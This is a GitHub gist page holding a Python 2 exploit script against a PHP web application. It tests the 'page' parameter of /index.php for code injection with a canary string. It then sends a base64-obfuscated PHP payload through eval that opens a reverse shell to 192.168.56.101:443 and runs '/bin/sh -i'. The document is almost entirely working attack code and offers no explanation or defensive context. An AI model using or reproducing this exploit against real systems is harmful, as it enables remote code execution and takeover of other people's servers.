Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/env python
import sys, socket, requests, urllib
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <HOST>\n"
sys.exit()
uri="/index.php"
canary=urllib.urlencode({"page":"index');${print('THIS_IS_RANDOM_FOO')};#"})
r = requests.get("http://"+sys.argv[1] + uri + "?system=Admin&"+canary)
print(r.status_code, r.reason)
canary_position = r.text.find('THIS_IS_RANDOM_FOO')
if canary_position == -1:
print sys.argv[1]+" is not vulnerable"
sys.exit()
print sys.argv[1] + " is vulnerable. Sending payload"
buf="c2V0X3RpbWVfbGltaXQgKDApOyAkaXAgPSAiMTkyLjE2OC41Ni4xMDEiOyAkcG9ydCA9IDQ0MzsgJGNodW5rX3NpemUgPSAxNDAwOyAkd3JpdGVfYSA9IG51bGw7ICRlcnJvcl9hID0gbnVsbDsgJHNoZWxsID0gInVuYW1lIC1hOyB3OyBpZDsgL2Jpbi9zaCAtaSI7ICRkYWVtb24gPSAwOyAkZGVidWcgPSAwOyBpZiAoZnVuY3Rpb25fZXhpc3RzKCdwY250bF9mb3JrJykpIHsgJHBpZCA9IHBjbnRsX2ZvcmsoKTsgaWYgKCRwaWQgPT0gLTEpIHsgcHJpbnRpdCgiRVJST1I6IENhbid0IGZvcmsiKTsgZXhpdCgxKTsgfSBpZiAoJHBpZCkgeyBleGl0KDApOyB9IGlmIChwb3NpeF9zZXRzaWQoKSA9PSAtMSkgeyBwcmludGl0KCJFcnJvcjogQ2FuJ3Qgc2V0c2lkKCkiKTsgZXhpdCgxKTsgfSAkZGFlbW9uID0gMTsgfSBlbHNlIHsgcHJpbnRpdCgiV0FSTklORzogRmFpbGVkIHRvIGRhZW1vbmlzZS4gIFRoaXMgaXMgcXVpdGUgY29tbW9uIGFuZCBub3QgZmF0YWwuIik7IH0gY2hkaXIoIi8iKTsgdW1hc2soMCk7ICRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOyBpZiAoISRzb2NrKSB7IHByaW50aXQoIiRlcnJzdHIgKCRlcnJubykiKTsgZXhpdCgxKTsgfSAkZGVzY3JpcHRvcnNwZWMgPSBhcnJheSggMCA9PiBhcnJheSgicGlwZSIsICJyIiksIDEgPT4gYXJyYXkoInBpcGUiLCAidyIpLCAyID0+IGFycmF5KCJwaXBlIiwgInciKSk7ICRwcm9jZXNzID0gcHJvY19vcGVuKCRzaGVsbCwgJGRlc2NyaXB0b3JzcGVjLCAkcGlwZXMpOyBpZiAoIWlzX3Jlc291cmNlKCRwcm9jZXNzKSkgeyBwcmludGl0KCJFUlJPUjogQ2FuJ3Qgc3Bhd24gc2hlbGwiKTsgZXhpdCgxKTsgfSBzdHJlYW1fc2V0X2Jsb2NraW5nKCRwaXBlc1swXSwgMCk7IHN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzFdLCAwKTsgc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMl0sIDApOyBzdHJlYW1fc2V0X2Jsb2NraW5nKCRzb2NrLCAwKTsgcHJpbnRpdCgiU3VjY2Vzc2Z1bGx5IG9wZW5lZCByZXZlcnNlIHNoZWxsIHRvICRpcDokcG9ydCIpOyB3aGlsZSAoMSkgeyBpZiAoZmVvZigkc29jaykpIHsgcHJpbnRpdCgiRVJST1I6IFNoZWxsIGNvbm5lY3Rpb24gdGVybWluYXRlZCIpOyBicmVhazsgfSBpZiAoZmVvZigkcGlwZXNbMV0pKSB7IHByaW50aXQoIkVSUk9SOiBTaGVsbCBwcm9jZXNzIHRlcm1pbmF0ZWQiKTsgYnJlYWs7IH0gJHJlYWRfYSA9IGFycmF5KCRzb2NrLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7ICRudW1fY2hhbmdlZF9zb2NrZXRzID0gc3RyZWFtX3NlbGVjdCgkcmVhZF9hLCAkd3JpdGVfYSwgJGVycm9yX2EsIG51bGwpOyBpZiAoaW5fYXJyYXkoJHNvY2ssICRyZWFkX2EpKSB7IGlmICgkZGVidWcpIHByaW50aXQoIlNPQ0sgUkVBRCIpOyAkaW5wdXQgPSBmcmVhZCgkc29jaywgJGNodW5rX3NpemUpOyBpZiAoJGRlYnVnKSBwcmludGl0KCJTT0NLOiAkaW5wdXQiKTsgZndyaXRlKCRwaXBlc1swXSwgJGlucHV0KTsgfSBpZiAoaW5fYXJyYXkoJHBpcGVzWzFdLCAkcmVhZF9hKSkgeyBpZiAoJGRlYnVnKSBwcmludGl0KCJTVERPVVQgUkVBRCIpOyAkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMV0sICRjaHVua19zaXplKTsgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU1RET1VUOiAkaW5wdXQiKTsgZndyaXRlKCRzb2NrLCAkaW5wdXQpOyB9IGlmIChpbl9hcnJheSgkcGlwZXNbMl0sICRyZWFkX2EpKSB7IGlmICgkZGVidWcpIHByaW50aXQoIlNUREVSUiBSRUFEIik7ICRpbnB1dCA9IGZyZWFkKCRwaXBlc1syXSwgJGNodW5rX3NpemUpOyBpZiAoJGRlYnVnKSBwcmludGl0KCJTVERFUlI6ICRpbnB1dCIpOyBmd3JpdGUoJHNvY2ssICRpbnB1dCk7IH0gfSBmY2xvc2UoJHNvY2spOyBmY2xvc2UoJHBpcGVzWzBdKTsgZmNsb3NlKCRwaXBlc1sxXSk7IGZjbG9zZSgkcGlwZXNbMl0pOyBwcm9jX2Nsb3NlKCRwcm9jZXNzKTsgZnVuY3Rpb24gcHJpbnRpdCAoJHN0cmluZykgeyBpZiAoISRkYWVtb24pIHsgcHJpbnQgIiRzdHJpbmdcbiI7IH0gfQo"
shellcode=urllib.urlencode({"page":"index');${eval(base64_decode('"+buf+"'))};#"})
r = requests.get("http://"+sys.argv[1] + uri +"?system=Admin&" + shellcode)
print(r.status_code, r.reason)
print r.text
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment